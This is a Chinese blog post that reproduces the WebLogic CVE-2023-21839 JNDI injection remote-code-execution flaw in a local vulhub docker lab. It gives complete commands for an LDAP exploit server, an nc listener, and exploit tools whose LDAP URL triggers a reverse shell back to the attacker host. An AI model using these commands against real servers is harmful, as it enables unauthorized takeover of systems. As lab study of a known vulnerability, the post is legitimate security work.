CVE-2023-21839漏洞本地简单复现

已于 2023-03-15 14:31:28 修改
阅读量5k 收藏 12
点赞数 3
分类专栏: 漏洞复现 文章标签: web安全 乌鸦安全 Weblogic CVE-2023-21839 攻防
于 2023-02-27 18:26:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdnmmd/article/details/129247272
版权

image.png

1. 说明

本文漏洞环境由vulhub下载后在本地部署:https://github.com/vulhub
本文漏洞利用工具1来源于:https://github.com/DXask88MA/Weblogic-CVE-2023-21839(可能是我利用姿势不太对,没成功)
本文漏洞利用工具2来源于:https://github.com/4ra1n/CVE-2023-21839
本文漏洞利用工具3来源于:https://github.com/WhiteHSBG/JNDIExploit

我主要是对漏洞进行了本地的简单复现,其中用到的工具都是各位大神的,我对4ra1n给的工具进行了编译。

2. 漏洞复现

2.1 漏洞原理

CVE-2023-21839 允许远程用户在未经授权的情况下通过 IIOP/T3 进行 JNDI lookup 操作,当 JDK 版本过低或本地存在小工具(javaSerializedData)时,这可能会导致RCE漏洞。
以上来源于:

https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2023-21839/README.zh-cn.md

2.2 环境搭建

下载之后在本地使用docker部署:

docker-compose up -d

image.png

访问本地:http://127.0.0.1:7001/,出现以下界面证明环境搭建成功:
image.png

然后访问:http://127.0.0.1:7001/console/,等待几秒之后,即可访问到后台管理登录界面。
image.png

使用原来的Weblogic漏洞RCE神器进行测试,偶然发现存在cve-2016-3510

image.png

2.3 漏洞复现-失败

攻击机kali : 192.168.135.22java11
目标机:10.30.0.214mac启动的dockerjava8
中转文件:JNDIExploit-1.4-SNAPSHOT.jar
kali上同时启动监听、命令执行、反弹shell的工作,先监听:

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 10.30.0.214

image.png

然后在本地开启监听:

nc -lvnp 7777

image.png

使用下面的工具进行测试:

https://github.com/DXask88MA/Weblogic-CVE-2023-21839

命令(要记得使用java8的环境,不然会报错):

java -jar Weblogic-CVE-2023-21839.jar 10.30.0.214:7001 ldap://192.168.135.22:1389/Basic/ReverseShell/192.168.135.22/7777


[*]java -jar 目标ip:端口 ldap地址
java -jar Weblogic-CVE-2023-21839.jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111

通过多次测试,发现还是有问题,能执行但是回不来:
可能是姿势不太对。。。
image.png
因为时间关系,暂时就不测试了。

2.4 漏洞复现2-成功

攻击机kali : 192.168.135.22java11
目标机:10.30.0.214mac启动的dockerjava8
中转文件:JNDIExploit-1.4-SNAPSHOT.jar
首先在kali上设置监听,用于接收反弹的shell
image.png

再通过kali上来设置监听:

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.135.22

image.png

最后使用工具来进行攻击测试,使用工具来源于:https://github.com/4ra1n/CVE-2023-21839
将工具下载下来之后,在有go的环境中编译一下:

cd cmd
go build -o CVE-2023-21839

image.png

使用的时候,按照作者的方法来执行:

./CVE-2023-21839 -ip 10.30.0.214 -port 7001 -ldap ldap://192.168.135.22:1389/Basic/ReverseShell/192.168.135.22/7777
10.30.0.214为靶机
192.168.22.105为攻击机,也是接收反弹shell的ip

image.png

漏洞复现之后,记得及时关闭环境:
image.png

2.5 windows下工具使用

在这里使用windows版本的试下:
image.png

image.png

同样可以成功。

乌鸦安全
关注
  • 3
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CVE-2023-21839Weblogic反序列化漏洞复现
薛定谔嘚喵博客
04-16 3895
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
CVE-2023-21839漏洞复现
qq_34914659的博客
02-28 4035
CVE-2023-21839漏洞复现
JNDIExploit-1.4-SNAPSHOT.jar
01-10
编译后的JNDIExploit-1.4-SNAPSHOT.jar,可以直接用,1.4版本支持tomcatBypass路由直接上线msf。
hvv 前网安人必读的漏洞清单(2024年)
最新发布
2401_84466229的博客
05-28 2038
数字化浪潮席卷全球,安全漏洞的发现和利用频率正以惊人的速度上升,尤其是工业自动化、绿色能源、财经领域、交通系统、国家防务以及医疗行业等关键部门,成为了网络攻击者的主要目标。数据侵犯和勒索软件的攻击层出不穷,凸显了安全漏洞正被黑客用作主要的攻击渠道。本文梳理、分析了 2023 年危害巨大、影响范围广泛、且攻击手法多变的漏洞,旨在为网络安全界的实践者们提供一个详细的漏洞信息概览,帮助安全从业者能够更全面地掌握这些安全威胁,并据此构建更为坚固的安全防线。
CVE-2023-21839漏洞复现(基于vulhub)
weixin_63960760的博客
09-11 848
由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
漏洞复现Weblogic CVE-2023-21839
zg_111的博客
03-23 6466
Weblogic CVE-2023-21839漏洞复现
Weblogic远程代码执行漏洞CVE-2023-21839复现/保姆级讲解
BGiscool的博客
02-28 4482
由于WeblogicIIOP/T3协议存在缺陷,当IIOP/T3协议开启时,未经身份验证的攻击者通过IIOP/T3协议向受影响的服务器发送恶意的请求,最终导致在目标服务器上访问敏感信息并执行任意代码。
CVE-2021-4034漏洞复现
weixin_50825713的博客
01-27 4124
漏洞描述: 最近公开了CVE-2021-4034漏洞,这个漏洞主要就是利用Linux下polkit工具集的本地权限提升漏洞,任何本地非特权用户可以通过这个漏洞获得root权限。 影响范围: 非特权用户可以通过此漏洞获取root权限,目前主流的Linux版本均受影响。 漏洞利用: 先将poc上传到kali or Linux中(这里是普通用户登录)。 然后切换到该目录下查看是否存在。 然后通过gcc编译器进行编译,通过-o指定生成的结果文件。 然后切换到当前目录下的这个新生成.
CVE-2020-8163:CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码
03-09
CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码 在Rails <5.0.1中远程执行用户提供的本地名称 5.0.1之前的Rails版本中存在一个漏洞,该漏洞将允许攻击者控制render调用的locals参数。 已为该漏洞...
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
[Timeline Sec] - CVE-2020-9484:Tomcat Session 反序列化复现1
08-03
【Apache Tomcat与Session反序列化漏洞CVE-2020-9484详解】 Apache Tomcat是一款广泛使用的开源Web应用服务器,它基于Java,主要用于运行Servlet和JSP(JavaServer Pages)应用程序。在2020年,Tomcat被发现存在一...
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
Weblogic远程代码执行漏洞CVE-2023-21839)复现
yunshang_secure的博客
12-23 2059
复现过程中,会出现各种各样报错,小伙伴多找网上文章解决,本文仅作参考。
复现CVE-2023-21839
Coder的博客
05-02 1819
下载jdk1.8或#创建java文件夹#解压后更改文件夹名字为 jdk1.8.0.372#将文件夹移动到/usr/local/java目录下验证是否安装成功javac如有提示,安装完成。
CVE-2023-21839 Weblogic IIOP RCE复现
Love&Share
04-14 1564
WebLogic是美国Oracle公司出品的一个application server,用于本地和云端开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic Server是一个基于JAVAEE架构的中间件,将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中,提供了Java Enterprise Edition (EE)和Jakarta EE的可靠、成熟和可扩展的实现。
CVE-2023-21839 【vulhub weblogic 漏洞复现
weixin_65722679的博客
07-05 709
CVE-2023-21839 【vulhub weblogic 漏洞复现
CVE-2023-21839远程代码执行漏洞
刘家华(游戏开发)
05-01 1544
weblogic CVE-2023-21839CVE-2023-21931、CVE-2023-21979远程代码执行漏洞复现
log4j漏洞复现
weixin_68647219的博客
04-20 4583
2021年12月8号爆出的log4j2的远程代码执行漏洞cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。
sql 传 日期对比 2023-05 报错怎么解决
05-26
报错信息不够详细,无法确定具体的解决方法。一般来说,SQL 传日期对比时,需要使用正确的日期格式,并且要注意大小写。例如,如果要比较日期是否在 2023 年 5 月之前,可以使用以下语句: ``` SELECT * FROM table_name WHERE date_column < '2023-05-01' ``` 如果还是遇到问题,可以提供更详细的报错信息和代码,以便更好地帮助您解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值